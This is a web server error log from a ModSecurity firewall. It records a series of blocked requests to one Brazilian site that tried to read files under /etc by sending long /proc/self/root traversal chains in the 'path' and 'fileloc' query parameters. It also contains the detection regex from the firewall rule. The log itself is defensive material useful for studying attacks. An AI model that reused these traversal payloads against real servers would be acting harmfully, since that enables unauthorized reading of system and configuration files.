[Mon Mar 16 14:32:30.100497 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:33730] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-rnjZBu2q05ozVU9jdAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:32.518539 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.241.46:33746] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-sKTCbgAP5jq5Teg1GAAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:33.948357 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:33760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-sbABkC4fWIHEf8H40wAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:35.220771 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:33764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-s_9ocpUE4ed4uDz5CwAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:36.547581 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.241.46:33774] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-tLysWC90G-1nBrBNuwAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:37.760333 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.241.46:33780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-tXjZBu2q05ozVU9jiwAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:39.199418 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.241.46:47780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-t3jZBu2q05ozVU9jjgAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:39.705395 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.243.203:34828] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-t3jZBu2q05ozVU9jjwAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:32:40.543026 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:47782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-uNSswJuvopo3lOhoqAAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:41.927427 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.241.46:47786] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-uaQpVkWug9HeOt8_bQAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:43.283869 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:47796] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-u7ABkC4fWIHEf8H41wAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:44.672989 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:47798] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-vI6lpbStxTqkSkt1sgAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:46.072651 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:47812] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-vrABkC4fWIHEf8H42AAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:47.723072 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.241.46:47816] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-v5qj1wV0Si-Okef4LQAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:48.928945 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.241.46:38534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-wJqj1wV0Si-Okef4LgAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:50.256553 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:38542] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-wv9ocpUE4ed4uDz5DwAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:51.476173 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:38544] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-w_9ocpUE4ed4uDz5EAAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:52.788941 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:38558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-xLysWC90G-1nBrBNwAAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:54.117303 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:38572] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-xpqj1wV0Si-Okef4MQAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:55.290658 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.241.46:38578] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-x5qj1wV0Si-Okef4MgAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:32:56.651887 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:38582] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-yLysWC90G-1nBrBNwQAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
